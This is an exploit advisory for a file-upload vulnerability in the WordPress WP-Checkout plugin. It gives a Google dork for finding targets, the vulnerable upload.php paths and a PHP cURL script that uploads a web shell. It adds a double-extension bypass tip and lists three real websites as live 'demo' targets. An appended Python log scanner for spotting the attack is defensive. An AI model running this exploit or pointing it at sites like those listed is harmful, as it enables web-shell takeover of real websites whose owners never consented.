
Wordpress Plugin WP-CHECKOUT File Upload vulnerability

Author: TUNISIAN CYBER, Published: 12-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Wordpress Plugin WP-CHECKOUT File Upload vulnerability
[+] Date: 12-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"/wp-content/plugins/wp-checkout/vendors/"
[+] Tested on: KaliLinux
[+] Friend's blog: www.na3il.com

########################################################################################
+Exploit:
WordPress's plugin WP-Checkout suffers from a File Upload vulnerability.
+P.O.C:
127.0.0.1/[PATH]//wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
127.0.0.1/[PATH]//wp-content/plugins/wp-checkout/vendors/uploadify/upload.php

<?php
echo "=============================================== \n";
echo "   WP CHECKOUT File Upload Vulnerability   \n";
echo "                 TUNISIAN CYBER   \n";
echo "=============================================== \n\n";
$uploadfile = "3v!L.php";
$ch = curl_init("site.ltd/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('imgFile' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Shell path:
site.ltd/wp-content/upload/uploadify/$postResult content
PS: in some cases, for ajaxupload you should use a double extension (.php.jpg)
Demo:
http://christinabodyfit.com/blog/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
https://www.wetumpka-paintball.com/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php

Patch:
Enable Mod_Security.
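
To check whether a site was already hit before a WAF rule went in, the access log can be reviewed for the two upload endpoints and for script files served from the upload directory. The following is an added example, not part of the original advisory: the combined log format, the function name scan() and the sample log lines are assumptions made for illustration.

```python
import re

# Apache/nginx "combined" log format is assumed; adjust LINE for other layouts.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The two upload endpoints named in the advisory.
ENDPOINT = re.compile(
    r'/wp-content/plugins/wp-checkout/vendors/(?:ajaxupload|uploadify)/upload\.php', re.I)
# Script-like file served from an upload directory, including the
# double-extension form (.php.jpg) the advisory mentions.
DROPPED = re.compile(
    r'/wp-content/uploads?/[^?\s]*\.(?:php\d?|phtml|phar)(?:\.[a-z0-9]+)?(?:\?|$)', re.I)

def scan(lines):
    """Return (kind, ip, timestamp, path) findings for log lines worth triage."""
    findings = []
    posted = set()  # client IPs that POSTed to an upload endpoint
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, path, status = m['ip'], m['path'], m['status']
        if m['method'] == 'POST' and ENDPOINT.search(path):
            posted.add(ip)
            kind = 'upload-post' if status.startswith('2') else 'upload-probe'
            findings.append((kind, ip, m['ts'], path))
        elif DROPPED.search(path) and status.startswith('2'):
            kind = 'script-after-upload' if ip in posted else 'script-in-uploads'
            findings.append((kind, ip, m['ts'], path))
    return findings

# Constructed sample lines (documentation IP ranges, invented file names).
SAMPLE = [
    '198.51.100.7 - - [12/Jan/2014:10:00:01 +0000] "POST /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php HTTP/1.1" 200 41 "-" "curl"',
    '198.51.100.7 - - [12/Jan/2014:10:00:09 +0000] "GET /wp-content/upload/uploadify/a1b2c3.php HTTP/1.1" 200 512 "-" "curl"',
    '203.0.113.9 - - [12/Jan/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/01/photo.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Jan/2014:10:05:00 +0000] "POST /wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php HTTP/1.1" 404 0 "-" "curl"',
    '192.0.2.55 - - [12/Jan/2014:10:07:00 +0000] "GET /wp-content/uploads/avatar.php.jpg HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

An 'upload-post' followed by 'script-after-upload' from the same client is the pattern to treat as a likely compromise; 'upload-probe' means the endpoint was requested but did not answer with a 2xx status.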

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
